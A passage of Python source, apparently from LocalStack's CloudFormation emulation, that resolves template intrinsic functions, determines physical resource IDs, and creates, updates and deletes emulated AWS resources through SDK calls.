if attribute == 'DomainEndpoint':
domain_status = resource_state.get('DomainStatus', {})
result = domain_status.get('Endpoint')
if result:
return result
if attribute in ['Arn', 'DomainArn']:
domain_name = resource_props.get('DomainName') or resource_state.get('DomainName')
return aws_stack.es_domain_arn(domain_name)
elif resource_type == 'StepFunctions::StateMachine':
if is_ref_attr_or_arn:
return resource_state['stateMachineArn']
elif resource_type == 'SNS::Topic':
if is_ref_attribute and resource_state.get('TopicArn'):
topic_arn = resource_state.get('TopicArn')
return resolve_refs_recursively(stack_name, topic_arn, resources)
elif resource_type == 'SQS::Queue':
if is_ref_attr_or_arn:
if attribute == 'Arn' and resource_state.get('QueueArn'):
return resolve_refs_recursively(stack_name, resource_state.get('QueueArn'), resources)
return aws_stack.get_sqs_queue_url(resource_props.get('QueueName'))
attribute_lower = common.first_char_to_lower(attribute)
result = resource_state.get(attribute) or resource_state.get(attribute_lower)
if result is None and isinstance(resource, dict):
result = resource_props.get(attribute) or resource_props.get(attribute_lower)
if result is None:
result = get_attr_from_model_instance(resource, attribute,
resource_type=resource_type, resource_id=resource_id)
if is_ref_attribute:
for attr in ['Id', 'PhysicalResourceId', 'Ref']:
if result is None:
for obj in [resource_state, resource]:
result = result or obj.get(attr)
return result
def canonical_resource_type(resource_type):
if '::' in resource_type and not resource_type.startswith('AWS::'):
resource_type = 'AWS::%s' % resource_type
return resource_type
def get_attr_from_model_instance(resource, attribute, resource_type, resource_id=None):
resource_type = canonical_resource_type(resource_type)
# TODO: remove moto.MODEL_MAP here
model_class = RESOURCE_MODELS.get(resource_type) or parsing.MODEL_MAP.get(resource_type)
if not model_class:
if resource_type not in ['AWS::Parameter', 'Parameter']:
LOG.debug('Unable to find model class for resource type "%s"' % resource_type)
return
try:
inst = model_class(resource_name=resource_id, resource_json=resource)
return inst.get_cfn_attribute(attribute)
except Exception:
pass
def resolve_ref(stack_name, ref, resources, attribute):
if ref == 'AWS::Region':
return aws_stack.get_region()
if ref == 'AWS::Partition':
return 'aws'
if ref == 'AWS::StackName':
return stack_name
if ref == 'AWS::StackId':
# TODO return proper stack id!
return stack_name
if ref == 'AWS::AccountId':
return TEST_AWS_ACCOUNT_ID
if ref == 'AWS::NoValue':
return PLACEHOLDER_AWS_NO_VALUE
if ref == 'AWS::NotificationARNs':
# TODO!
return {}
if ref == 'AWS::URLSuffix':
return AWS_URL_SUFFIX
is_ref_attribute = attribute in ['Ref', 'PhysicalResourceId', 'Arn']
if is_ref_attribute:
resolve_refs_recursively(stack_name, resources.get(ref, {}), resources)
return determine_resource_physical_id(resource_id=ref,
resources=resources, attribute=attribute, stack_name=stack_name)
if resources.get(ref):
if isinstance(resources[ref].get(attribute), (str, int, float, bool, dict)):
return resources[ref][attribute]
# fetch resource details
resource_new = retrieve_resource_details(ref, {}, resources, stack_name)
if not resource_new:
raise DependencyNotYetSatisfied(resource_ids=ref,
message='Unable to fetch details for resource "%s" (resolving attribute "%s")' % (ref, attribute))
resource = resources.get(ref)
resource_type = get_resource_type(resource)
result = extract_resource_attribute(resource_type, resource_new, attribute,
resource_id=ref, resource=resource, resources=resources, stack_name=stack_name)
if result is None:
LOG.warning('Unable to extract reference attribute "%s" from resource: %s %s' %
(attribute, resource_new, resource))
return result
# Using a @prevent_stack_overflow decorator here to avoid infinite recursion
# in case we load stack exports that have circula dependencies (see issue 3438)
# TODO: Potentially think about a better approach in the future
@prevent_stack_overflow(match_parameters=True)
def resolve_refs_recursively(stack_name, value, resources):
if isinstance(value, dict):
keys_list = list(value.keys())
stripped_fn_lower = keys_list[0].lower().split('::')[-1] if len(keys_list) == 1 else None
# process special operators
if keys_list == ['Ref']:
ref = resolve_ref(stack_name, value['Ref'], resources, attribute='Ref')
if ref is None:
msg = 'Unable to resolve Ref for resource "%s" (yet)' % value['Ref']
LOG.debug('%s - %s' % (msg, resources.get(value['Ref']) or set(resources.keys())))
raise DependencyNotYetSatisfied(resource_ids=value['Ref'], message=msg)
ref = resolve_refs_recursively(stack_name, ref, resources)
return ref
if stripped_fn_lower == 'getatt':
attr_ref = value[keys_list[0]]
attr_ref = attr_ref.split('.') if isinstance(attr_ref, str) else attr_ref
return resolve_ref(stack_name, attr_ref[0], resources, attribute=attr_ref[1])
if stripped_fn_lower == 'join':
join_values = value[keys_list[0]][1]
join_values = [resolve_refs_recursively(stack_name, v, resources) for v in join_values]
none_values = [v for v in join_values if v is None]
if none_values:
raise Exception('Cannot resolve CF fn::Join %s due to null values: %s' % (value, join_values))
return value[keys_list[0]][0].join([str(v) for v in join_values])
if stripped_fn_lower == 'sub':
item_to_sub = value[keys_list[0]]
attr_refs = dict([(r, {'Ref': r}) for r in STATIC_REFS])
if not isinstance(item_to_sub, list):
item_to_sub = [item_to_sub, {}]
result = item_to_sub[0]
item_to_sub[1].update(attr_refs)
for key, val in item_to_sub[1].items():
val = resolve_refs_recursively(stack_name, val, resources)
result = result.replace('${%s}' % key, val)
# resolve placeholders
result = resolve_placeholders_in_string(result, stack_name=stack_name, resources=resources)
return result
if stripped_fn_lower == 'findinmap':
attr = resolve_refs_recursively(stack_name, value[keys_list[0]][1], resources)
result = resolve_ref(stack_name, value[keys_list[0]][0], resources, attribute=attr)
if not result:
raise Exception('Cannot resolve fn::FindInMap: %s %s' % (value[keys_list[0]], list(resources.keys())))
key = value[keys_list[0]][2]
if not isinstance(key, str):
key = resolve_refs_recursively(stack_name, key, resources)
return result.get(key)
if stripped_fn_lower == 'importvalue':
import_value_key = resolve_refs_recursively(stack_name, value[keys_list[0]], resources)
if config.USE_MOTO_CF:
exports = cloudformation_backends[aws_stack.get_region()].exports
export = exports[import_value_key]
return export.value
stack = find_stack(stack_name)
return stack.exports_map[import_value_key]['Value']
if stripped_fn_lower == 'if':
condition, option1, option2 = value[keys_list[0]]
condition = evaluate_condition(stack_name, condition, resources)
return resolve_refs_recursively(stack_name, option1 if condition else option2, resources)
if stripped_fn_lower == 'not':
condition = value[keys_list[0]][0]
condition = resolve_refs_recursively(stack_name, condition, resources)
return not condition
if stripped_fn_lower == 'equals':
operand1, operand2 = value[keys_list[0]]
operand1 = resolve_refs_recursively(stack_name, operand1, resources)
operand2 = resolve_refs_recursively(stack_name, operand2, resources)
return str(operand1) == str(operand2)
if stripped_fn_lower == 'select':
index, values = value[keys_list[0]]
index = resolve_refs_recursively(stack_name, index, resources)
values = resolve_refs_recursively(stack_name, values, resources)
return values[index]
if stripped_fn_lower == 'split':
delimiter, string = value[keys_list[0]]
delimiter = resolve_refs_recursively(stack_name, delimiter, resources)
string = resolve_refs_recursively(stack_name, string, resources)
return string.split(delimiter)
if stripped_fn_lower == 'getazs':
region = resolve_refs_recursively(stack_name, value['Fn::GetAZs'], resources) or aws_stack.get_region()
azs = []
for az in ('a', 'b', 'c', 'd'):
azs.append('%s%s' % (region, az))
return azs
if stripped_fn_lower == 'base64':
value_to_encode = value[keys_list[0]]
value_to_encode = resolve_refs_recursively(stack_name, value_to_encode, resources)
return to_str(base64.b64encode(to_bytes(value_to_encode)))
for key, val in dict(value).items():
value[key] = resolve_refs_recursively(stack_name, val, resources)
if isinstance(value, list):
for i in range(len(value)):
value[i] = resolve_refs_recursively(stack_name, value[i], resources)
return value
def resolve_placeholders_in_string(result, stack_name=None, resources=None):
def _replace(match):
parts = match.group(1).split('.')
if len(parts) == 2:
resolved = resolve_ref(stack_name, parts[0].strip(), resources, attribute=parts[1].strip())
if resolved is None:
raise DependencyNotYetSatisfied(resource_ids=parts[0],
message='Unable to resolve attribute ref %s' % match.group(1))
return resolved
if len(parts) == 1 and parts[0] in resources:
resource_json = resources[parts[0]]
result = extract_resource_attribute(resource_json.get('Type'), {}, 'Ref',
resources=resources, resource_id=parts[0], stack_name=stack_name)
if result is None:
raise DependencyNotYetSatisfied(resource_ids=parts[0],
message='Unable to resolve attribute ref %s' % match.group(1))
return result
# TODO raise exception here?
return match.group(0)
regex = r'\$\{([^\}]+)\}'
result = re.sub(regex, _replace, result)
return result
def evaluate_condition(stack_name, condition, resources):
condition = resolve_refs_recursively(stack_name, condition, resources)
condition = resolve_ref(stack_name, condition, resources, attribute='Ref')
condition = resolve_refs_recursively(stack_name, condition, resources)
return condition
def evaluate_resource_condition(resource, stack_name, resources):
condition = resource.get('Condition')
if condition:
condition = evaluate_condition(stack_name, condition, resources)
if condition is False or condition in FALSE_STRINGS or is_none_or_empty_value(condition):
return False
return True
def get_stack_parameter(stack_name, parameter):
try:
client = aws_stack.connect_to_service('cloudformation')
stack = client.describe_stacks(StackName=stack_name)['Stacks']
except Exception:
return None
stack = stack and stack[0]
if not stack:
return None
result = [p['ParameterValue'] for p in stack['Parameters'] if p['ParameterKey'] == parameter]
return (result or [None])[0]
def update_resource(resource_id, resources, stack_name):
resource = resources[resource_id]
resource_type = get_resource_type(resource)
if resource_type not in UPDATEABLE_RESOURCES:
LOG.warning('Unable to update resource type "%s", id "%s"' % (resource_type, resource_id))
return
LOG.info('Updating resource %s of type %s' % (resource_id, resource_type))
canonical_type = canonical_resource_type(resource_type)
resource_class = RESOURCE_MODELS.get(canonical_type)
if resource_class:
instance = resource_class(resource)
return instance.update_resource(resource, stack_name=stack_name, resources=resources)
def fix_account_id_in_arns(params):
def fix_ids(o, **kwargs):
if isinstance(o, dict):
for k, v in o.items():
if common.is_string(v, exclude_binary=True):
o[k] = aws_stack.fix_account_id_in_arns(v)
elif common.is_string(o, exclude_binary=True):
o = aws_stack.fix_account_id_in_arns(o)
return o
result = common.recurse_object(params, fix_ids)
return result
def convert_data_types(func_details, params):
""" Convert data types in the "params" object, with the type defs
specified in the 'types' attribute of "func_details". """
types = func_details.get('types') or {}
attr_names = types.keys() or []
def cast(_obj, _type):
if _type == bool:
return _obj in ['True', 'true', True]
if _type == str:
return str(_obj)
if _type == int:
return int(_obj)
return _obj
def fix_types(o, **kwargs):
if isinstance(o, dict):
for k, v in o.items():
if k in attr_names:
o[k] = cast(v, types[k])
return o
result = common.recurse_object(params, fix_types)
return result
# TODO remove this method
def prepare_template_body(req_data):
return template_preparer.prepare_template_body(req_data)
def deploy_resource(resource_id, resources, stack_name):
return execute_resource_action(resource_id, resources, stack_name, ACTION_CREATE)
def delete_resource(resource_id, resources, stack_name):
res = resources[resource_id]
res_type = res.get('Type')
if res_type == 'AWS::S3::Bucket':
s3_listener.remove_bucket_notification(res['PhysicalResourceId'])
if res_type == 'AWS::IAM::Role':
role_name = res.get('PhysicalResourceId') or res.get('Properties', {}).get('RoleName')
try:
iam_client = aws_stack.connect_to_service('iam')
rs = iam_client.list_role_policies(RoleName=role_name)
for policy in rs['PolicyNames']:
iam_client.delete_role_policy(RoleName=role_name, PolicyName=policy)
rs = iam_client.list_instance_profiles_for_role(RoleName=role_name)
for instance_profile in rs['InstanceProfiles']:
ip_name = instance_profile['InstanceProfileName']
iam_client.remove_role_from_instance_profile(
InstanceProfileName=ip_name,
RoleName=role_name
)
# iam_client.delete_instance_profile(
# InstanceProfileName=ip_name
# )
except Exception as e:
if 'NoSuchEntity' not in str(e):
raise
if res_type == 'AWS::EC2::VPC':
state = res['_state_']
physical_resource_id = res['PhysicalResourceId'] or state.get('VpcId')
res['PhysicalResourceId'] = physical_resource_id
if state.get('VpcId'):
ec2_client = aws_stack.connect_to_service('ec2')
resp = ec2_client.describe_route_tables(
Filters=[
{'Name': 'vpc-id', 'Values': [state.get('VpcId')]},
{'Name': 'association.main', 'Values': ['false']}
]
)
for rt in resp['RouteTables']:
ec2_client.delete_route_table(RouteTableId=rt['RouteTableId'])
if res_type == 'AWS::EC2::Subnet':
state = res['_state_']
physical_resource_id = res['PhysicalResourceId'] or state['SubnetId']
res['PhysicalResourceId'] = physical_resource_id
if res_type == 'AWS::EC2::RouteTable':
ec2_client = aws_stack.connect_to_service('ec2')
resp = ec2_client.describe_vpcs()
vpcs = [vpc['VpcId'] for vpc in resp['Vpcs']]
vpc_id = res.get('Properties', {}).get('VpcId')
if vpc_id not in vpcs:
# VPC already deleted before
return
return execute_resource_action(resource_id, resources, stack_name, ACTION_DELETE)
def execute_resource_action_fallback(action_name, resource_id, resources, stack_name, resource, resource_type):
# using moto as fallback for now - TODO remove in the future!
msg = 'Action "%s" for resource type %s not yet implemented' % (action_name, resource_type)
long_type = canonical_resource_type(resource_type)
clazz = parsing.MODEL_MAP.get(long_type)
if not clazz:
LOG.warning(msg)
return
LOG.info('%s - using fallback mechanism' % msg)
if action_name == ACTION_CREATE:
resource_name = get_resource_name(resource) or resource_id
result = clazz.create_from_cloudformation_json(resource_name, resource, aws_stack.get_region())
return result
def execute_resource_action(resource_id, resources, stack_name, action_name):
resource = resources[resource_id]
resource_type = get_resource_type(resource)
func_details = get_deployment_config(resource_type)
if not func_details or action_name not in func_details:
if resource_type in ['Parameter']:
return
return execute_resource_action_fallback(action_name,
resource_id, resources, stack_name, resource, resource_type)
LOG.debug('Running action "%s" for resource type "%s" id "%s"' % (action_name, resource_type, resource_id))
func_details = func_details[action_name]
func_details = func_details if isinstance(func_details, list) else [func_details]
results = []
for func in func_details:
if callable(func['function']):
result = func['function'](resource_id, resources, resource_type, func, stack_name)
results.append(result)
continue
client = get_client(resource, func)
if client:
result = configure_resource_via_sdk(resource_id, resources, resource_type, func, stack_name, action_name)
results.append(result)
return (results or [None])[0]
def fix_resource_props_for_sdk_deployment(resource_type, resource_props):
if resource_type == 'Lambda::Function':
# Properties will be validated by botocore before sending request to AWS
# botocore/data/lambda/2015-03-31/service-2.json:1161 (EnvironmentVariableValue)
# https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-lambda-function-environment.html
if 'Environment' in resource_props:
environment_variables = resource_props['Environment'].get('Variables', {})
resource_props['Environment']['Variables'] = {k: str(v) for k, v in environment_variables.items()}
if resource_type == 'SQS::Queue':
# https://github.com/localstack/localstack/issues/3004
if 'ReceiveMessageWaitTimeSeconds' in resource_props:
resource_props['ReceiveMessageWaitTimeSeconds'] = int(resource_props['ReceiveMessageWaitTimeSeconds'])
if resource_type == 'KMS::Key':
resource_props['KeyPolicy'] = json.dumps(resource_props.get('KeyPolicy', {}))
resource_props['Enabled'] = resource_props.get('Enabled', True)
resource_props['EnableKeyRotation'] = resource_props.get('EnableKeyRotation', False)
resource_props['Description'] = resource_props.get('Description', '')
def configure_resource_via_sdk(resource_id, resources, resource_type, func_details, stack_name, action_name):
resource = resources[resource_id]
if resource_type == 'EC2::Instance':
if action_name == 'create':
func_details['boto_client'] = 'resource'
client = get_client(resource, func_details)
function = getattr(client, func_details['function'])
params = func_details.get('parameters') or lambda_get_params()
defaults = func_details.get('defaults', {})
resource_props = resource['Properties'] = resource.get('Properties', {})
resource_props = dict(resource_props)
# Validate props for each resource type
fix_resource_props_for_sdk_deployment(resource_type, resource_props)
if callable(params):
params = params(resource_props, stack_name=stack_name, resources=resources, resource_id=resource_id)
else:
# it could be a list ['param1', 'param2', {'apiCallParamName': 'cfResourcePropName'}]
if isinstance(params, list):
_params = {}
for param in params:
if isinstance(param, dict):
_params.update(param)
else:
_params[param] = param
params = _params
params = dict(params)
for param_key, prop_keys in dict(params).items():
params.pop(param_key, None)
if not isinstance(prop_keys, list):
prop_keys = [prop_keys]
for prop_key in prop_keys:
if prop_key == PLACEHOLDER_RESOURCE_NAME:
params[param_key] = PLACEHOLDER_RESOURCE_NAME
else:
if callable(prop_key):
prop_value = prop_key(resource_props, stack_name=stack_name,
resources=resources, resource_id=resource_id)
else:
prop_value = resource_props.get(prop_key, resource.get(prop_key))
if prop_value is not None:
params[param_key] = prop_value
break
# replace PLACEHOLDER_RESOURCE_NAME in params
resource_name_holder = {}
def fix_placeholders(o, **kwargs):
if isinstance(o, dict):
for k, v in o.items():
if v == PLACEHOLDER_RESOURCE_NAME:
if 'value' not in resource_name_holder:
resource_name_holder['value'] = get_resource_name(resource) or resource_id
o[k] = resource_name_holder['value']
return o
common.recurse_object(params, fix_placeholders)
# assign default values if empty
params = common.merge_recursive(defaults, params)
# this is an indicator that we should skip this resource deployment, and return
if params is None:
return
# convert refs and boolean strings
for param_key, param_value in dict(params).items():
if param_value is not None:
param_value = params[param_key] = resolve_refs_recursively(stack_name, param_value, resources)
# Convert to boolean (TODO: do this recursively?)
if str(param_value).lower() in ['true', 'false']:
params[param_key] = str(param_value).lower() == 'true'
# convert any moto account IDs (123456789012) in ARNs to our format (000000000000)
params = fix_account_id_in_arns(params)
# convert data types (e.g., boolean strings to bool)
params = convert_data_types(func_details, params)
# remove None values, as they usually raise boto3 errors
params = remove_none_values(params)
# run pre-actions
run_pre_create_actions(action_name, resource_id, resources, resource_type, stack_name, params)
# invoke function
try:
LOG.debug('Request for resource type "%s" in region %s: %s %s' % (
resource_type, aws_stack.get_region(), func_details['function'], params))
result = function(**params)
except Exception as e:
if action_name == 'delete' and check_not_found_exception(e, resource_type, resource):
return
LOG.warning('Error calling %s with params: %s for resource: %s' % (function, params, resource))
raise e
# run post-actions
run_post_create_actions(action_name, resource_id, resources, resource_type, stack_name, result)
return result
# TODO: move as individual functions to RESOURCE_TO_FUNCTION
def run_pre_create_actions(action_name, resource_id, resources, resource_type, stack_name, resource_params):
resource = resources[resource_id]
resource_props = resource['Properties'] = resource.get('Properties', {})
if resource_type == 'IAM::Role' and action_name == ACTION_DELETE:
iam = aws_stack.connect_to_service('iam')
role_name = resource_props['RoleName']
for policy in iam.list_attached_role_policies(RoleName=role_name).get('AttachedPolicies', []):
iam.detach_role_policy(RoleName=role_name, PolicyArn=policy['PolicyArn'])
if resource_type == 'S3::Bucket' and action_name == ACTION_DELETE:
s3 = aws_stack.connect_to_service('s3')
bucket_name = resource_props.get('BucketName')
try:
s3.delete_bucket_policy(Bucket=bucket_name)
except Exception:
pass
# TODO: verify whether AWS CF automatically deletes all bucket objects, or fails if bucket is non-empty
try:
delete_all_s3_objects(bucket_name)
except Exception as e:
if 'NoSuchBucket' not in str(e):
raise
# hack: make sure the bucket actually exists, to prevent delete_bucket operation later on from failing
s3.create_bucket(Bucket=bucket_name)
# TODO: move as individual functions to RESOURCE_TO_FUNCTION
def run_post_create_actions(action_name, resource_id, resources, resource_type, stack_name, result):
if action_name == ACTION_DELETE:
return result
resource = resources[resource_id]
resource_props = resource['Properties'] = resource.get('Properties', {})
# some resources have attached/nested resources which we need to create recursively now
if resource_type == 'ApiGateway::Method':
integration = resource_props.get('Integration')
apigateway = aws_stack.connect_to_service('apigateway')
if integration:
api_id = resolve_refs_recursively(stack_name, resource_props['RestApiId'], resources)
res_id = resolve_refs_recursively(stack_name, resource_props['ResourceId'], resources)
kwargs = {}
if integration.get('Uri'):
uri = resolve_refs_recursively(stack_name, integration.get('Uri'), resources)
# Moto has a validate method on Uri for integration_type "HTTP" | "HTTP_PROXY" that does not accept
# Uri value without path, we need to add path ("/") if not exists
if integration.get('Type') in ['HTTP', 'HTTP_PROXY']:
rs = urlparse(uri)
if not rs.path:
uri = '{}/'.format(uri)
kwargs['uri'] = uri
if integration.get('IntegrationHttpMethod'):
kwargs['integrationHttpMethod'] = integration['IntegrationHttpMethod']
apigateway.put_integration(
restApiId=api_id,
resourceId=res_id,
httpMethod=resource_props['HttpMethod'],
type=integration['Type'],
**kwargs
)
responses = resource_props.get('MethodResponses') or []
for response in responses:
api_id = resolve_refs_recursively(stack_name, resource_props['RestApiId'], resources)
res_id = resolve_refs_recursively(stack_name, resource_props['ResourceId'], resources)
apigateway.put_method_response(restApiId=api_id, resourceId=res_id,
httpMethod=resource_props['HttpMethod'], statusCode=str(response['StatusCode']),
responseParameters=response.get('ResponseParameters', {}))
elif resource_type == 'ApiGateway::RestApi':
body = resource_props.get('Body')
if body:
client = aws_stack.connect_to_service('apigateway')
body = json.dumps(body) if isinstance(body, dict) else body
client.put_rest_api(restApiId=result['id'], body=to_bytes(body))
elif resource_type == 'SNS::Topic':
subscriptions = resource_props.get('Subscription', [])
for subscription in subscriptions:
if is_none_or_empty_value(subscription):
continue
endpoint = resolve_refs_recursively(stack_name, subscription['Endpoint'], resources)
topic_arn = retrieve_topic_arn(resource_props['TopicName'])
aws_stack.connect_to_service('sns').subscribe(
TopicArn=topic_arn, Protocol=subscription['Protocol'], Endpoint=endpoint
)
elif resource_type == 'S3::Bucket':
tags = resource_props.get('Tags')
if tags:
aws_stack.connect_to_service('s3').put_bucket_tagging(
Bucket=resource_props['BucketName'], Tagging={'TagSet': tags})
elif resource_type == 'IAM::Role':
policies = resource_props.get('Policies', [])
for policy in policies:
iam = aws_stack.connect_to_service('iam')
pol_name = policy['PolicyName']
doc = dict(policy['PolicyDocument'])
doc['Version'] = doc.get('Version') or IAM_POLICY_VERSION
statements = doc['Statement'] if isinstance(doc['Statement'], list) else [doc['Statement']]
for statement in statements:
if isinstance(statement.get('Resource'), list):
# filter out empty resource strings
statement['Resource'] = [r for r in statement['Resource'] if r]
doc = json.dumps(doc)
LOG.debug('Running put_role_policy(...) for IAM::Role policy: %s %s %s' %
(resource_props['RoleName'], pol_name, doc))
iam.put_role_policy(RoleName=resource_props['RoleName'], PolicyName=pol_name, PolicyDocument=doc)
elif resource_type == 'IAM::Policy':
# associate policies with users, groups, roles
groups = resource_props.get('Groups', [])
roles = resource_props.get('Roles', [])
users = resource_props.get('Users', [])
policy_arn = aws_stack.policy_arn(resource_props.get('PolicyName'))
iam = aws_stack.connect_to_service('iam')
for group in groups:
iam.attach_group_policy(GroupName=group, PolicyArn=policy_arn)
for role in roles:
iam.attach_role_policy(RoleName=role, PolicyArn=policy_arn)
for user in users:
iam.attach_user_policy(UserName=user, PolicyArn=policy_arn)
elif resource_type == 'IAM::InstanceProfile':
if resource_props.get('Roles', []):
iam = aws_stack.connect_to_service('iam')
iam.add_role_to_instance_profile(
InstanceProfileName=resource_props['InstanceProfileName'],
RoleName=resource_props['Roles'][0]
)
def is_none_or_empty_value(value):
return not value or value == PLACEHOLDER_AWS_NO_VALUE
def determine_resource_physical_id(resource_id, resources=None, stack=None, attribute=None, stack_name=None):
resources = resources or stack.resources
stack_name = stack_name or stack.stack_name
resource = resources.get(resource_id, {})
if not resource:
return
resource_type = resource.get('Type') or ''
resource_type = re.sub('^AWS::', '', resource_type)
resource_props = resource.get('Properties', {})
# determine result from resource class
canonical_type = canonical_resource_type(resource_type)
resource_class = RESOURCE_MODELS.get(canonical_type)
if resource_class:
resource_inst = resource_class(resource)
resource_inst.fetch_state_if_missing(stack_name=stack_name, resources=resources)
result = resource_inst.get_physical_resource_id(attribute=attribute)
if result:
return result
# TODO: put logic into resource-specific model classes
if resource_type == 'ApiGateway::RestApi':
result = resource_props.get('id')
if result:
return result
elif resource_type == 'ApiGateway::Stage':
return resource_props.get('StageName')
elif resource_type == 'AppSync::DataSource':
return resource_props.get('DataSourceArn')
elif resource_type == 'KinesisFirehose::DeliveryStream':
return aws_stack.firehose_stream_arn(resource_props.get('DeliveryStreamName'))
elif resource_type == 'StepFunctions::StateMachine':
return aws_stack.state_machine_arn(resource_props.get('StateMachineName')) # returns ARN in AWS
elif resource_type == 'S3::Bucket':
if attribute == 'Arn':
return aws_stack.s3_bucket_arn(resource_props.get('BucketName'))
return resource_props.get('BucketName') # Note: "Ref" returns bucket name in AWS
elif resource_type == 'IAM::Role':
if attribute == 'Arn':
return aws_stack.role_arn(resource_props.get('RoleName'))
return resource_props.get('RoleName')
elif resource_type == 'SecretsManager::Secret':
arn = get_secret_arn(resource_props.get('Name')) or ''
if attribute == 'Arn':
return arn
return arn.split(':')[-1]
elif resource_type == 'IAM::Policy':
if attribute == 'Arn':
return aws_stack.policy_arn(resource_props.get('PolicyName'))
return resource_props.get('PolicyName')
elif resource_type == 'DynamoDB::Table':
table_name = resource_props.get('TableName')
if table_name:
if attribute == 'Ref':
return table_name # Note: "Ref" returns table name in AWS
return table_name
elif resource_type == 'Logs::LogGroup':
return resource_props.get('LogGroupName')
res_id = resource.get('PhysicalResourceId')
if res_id and attribute in [None, 'Ref', 'PhysicalResourceId']:
return res_id
result = extract_resource_attribute(resource_type, {}, attribute or 'PhysicalResourceId',
stack_name=stack_name, resource_id=resource_id, resource=resource, resources=resources)
if result is not None:
# note that value could be an empty string here (in case of Parameter values)
return result
LOG.info('Unable to determine PhysicalResourceId for "%s" resource, ID "%s"' % (resource_type, resource_id))
def update_resource_details(stack, resource_id, details, action=None):
resource = stack.resources.get(resource_id, {})
if not resource:
return
resource_type = resource.get('Type') or ''
resource_type = re.sub('^AWS::', '', resource_type)
resource_props = resource.get('Properties', {})
if resource_type == 'ApiGateway::RestApi':
resource_props['id'] = details['id']
if resource_type == 'KMS::Key':
resource['PhysicalResourceId'] = details['KeyMetadata']['KeyId']
if resource_type == 'EC2::Instance':
if action == 'CREATE':
resource['PhysicalResourceId'] = details[0].id
if resource_type == 'EC2::SecurityGroup':
resource['PhysicalResourceId'] = details['GroupId']
if resource_type == 'IAM::InstanceProfile':
resource['PhysicalResourceId'] = details['InstanceProfile']['InstanceProfileName']
if resource_type == 'Events::EventBus':
resource['PhysicalResourceId'] = details['EventBusArn']
if resource_type == 'StepFunctions::Activity':
resource['PhysicalResourceId'] = details['activityArn']
if resource_type == 'ApiGateway::Model':
resource['PhysicalResourceId'] = details['id']
if resource_type == 'EC2::VPC':
resource['PhysicalResourceId'] = details['Vpc']['VpcId']
if resource_type == 'EC2::Subnet':
resource['PhysicalResourceId'] = details['Subnet']['SubnetId']
if resource_type == 'EC2::RouteTable':
resource['PhysicalResourceId'] = details['RouteTable']['RouteTableId']
if resource_type == 'EC2::Route':
resource['PhysicalResourceId'] = generate_route_id(
resource_props['RouteTableId'],
resource_props.get('DestinationCidrBlock', ''),
resource_props.get('DestinationIpv6CidrBlock')
)
if isinstance(details, MotoCloudFormationModel):
# fallback: keep track of moto resource status
stack.moto_resource_statuses[resource_id] = details
def add_default_resource_props(resource, stack_name, resource_name=None,
resource_id=None, update=False, existing_resources=None):
""" Apply some fixes to resource props which otherwise cause deployments to fail """
res_type = resource['Type']
props = resource['Properties'] = resource.get('Properties', {})
existing_resources = existing_resources or {}
def _generate_res_name():
return '%s-%s-%s' % (stack_name, resource_name or resource_id, short_uid())
# TODO: move logic below into resource classes!
if res_type == 'AWS::Lambda::EventSourceMapping' and not props.get('StartingPosition'):
props['StartingPosition'] = 'LATEST'
elif res_type == 'AWS::Logs::LogGroup' and not props.get('LogGroupName') and resource_name:
props['LogGroupName'] = resource_name
elif res_type == 'AWS::Lambda::Function' and not props.get('FunctionName'):
props['FunctionName'] = '{}-lambda-{}'.format(stack_name[:45], short_uid())
elif res_type == 'AWS::SNS::Topic' and not props.get('TopicName'):
props['TopicName'] = 'topic-%s' % short_uid()
elif res_type == 'AWS::SQS::Queue' and not props.get('QueueName'):
props['QueueName'] = 'queue-%s' % short_uid()
elif res_type == 'AWS::SQS::QueuePolicy' and not resource.get('PhysicalResourceId'):
resource['PhysicalResourceId'] = _generate_res_name()
elif res_type == 'AWS::IAM::ManagedPolicy' and not resource.get('ManagedPolicyName'):
resource['ManagedPolicyName'] = _generate_res_name()
elif res_type == 'AWS::ApiGateway::RestApi' and not props.get('Name'):
props['Name'] = _generate_res_name()
elif res_type == 'AWS::ApiGateway::Stage' and not props.get('StageName'):
props['StageName'] = 'default'
elif res_type == 'AWS::ApiGateway::ApiKey' and not props.get('Name'):
props['Name'] = _generate_res_name()
elif res_type == 'AWS::ApiGateway::UsagePlan' and not props.get('UsagePlanName'):
props['UsagePlanName'] = _generate_res_name()
elif res_type == 'AWS::ApiGateway::Model' and not props.get('Name'):
props['Name'] = _generate_res_name()
elif res_type == 'AWS::DynamoDB::Table':
update_dynamodb_index_resource(resource)
props['TableName'] = props.get('TableName') or _generate_res_name()
elif res_type == 'AWS::S3::Bucket' and not props.get('BucketName'):
existing_bucket = existing_resources.get(resource_id) or {}
bucket_name = existing_bucket.get('Properties', {}).get('BucketName') or _generate_res_name()
props['BucketName'] = s3_listener.normalize_bucket_name(bucket_name)
elif res_type == 'AWS::StepFunctions::StateMachine' and not props.get('StateMachineName'):
props['StateMachineName'] = _generate_res_name()
elif res_type == 'AWS::CloudFormation::Stack' and not props.get('StackName'):
props['StackName'] = _generate_res_name()
elif res_type == 'AWS::EC2::SecurityGroup':
props['GroupName'] = props.get('GroupName') or _generate_res_name()
elif res_type == 'AWS::IAM::InstanceProfile':
props['InstanceProfileName'] = props.get('InstanceProfileName') or _generate_res_name()
elif res_type == 'AWS::KMS::Key':
tags = props['Tags'] = props.get('Tags', [])
existing = [t for t in tags if t['Key'] == 'localstack-key-id']
if not existing:
# append tags, to allow us to determine in service_models.py whether this key is already deployed
tags.append({'Key': 'localstack-key-id', 'Value': short_uid()})
# generate default names for certain resource types
default_attrs = (('AWS::IAM::Role', 'RoleName'), ('AWS::Events::Rule', 'Name'))
for entry in default_attrs:
if res_type == entry[0] and not props.get(entry[1]):
if not resource_id:
resource_id = canonical_json(json_safe(props))
resource_id = md5(resource_id)
props[entry[1]] = 'cf-%s-%s' % (stack_name, resource_id)
def update_dynamodb_index_resource(resource):
if resource.get('Properties').get('BillingMode') == 'PAY_PER_REQUEST':
for glob_index in resource.get('Properties', {}).get('GlobalSecondaryIndexes', []):
if not glob_index.get('ProvisionedThroughput'):
glob_index['ProvisionedThroughput'] = {'ReadCapacityUnits': 99, 'WriteCapacityUnits': 99}
# -----------------------
# MAIN TEMPLATE DEPLOYER
# -----------------------
class TemplateDeployer(object):
def __init__(self, stack):
self.stack = stack
@property
def resources(self):
return self.stack.resources
@property
def stack_name(self):
return self.stack.stack_name
# ------------------
# MAIN ENTRY POINTS
# ------------------
def deploy_stack(self):
self.stack.set_stack_status('CREATE_IN_PROGRESS')
try:
self.apply_changes(self.stack, self.stack, stack_name=self.stack.stack_name,
initialize=True, action='CREATE')
except Exception as e:
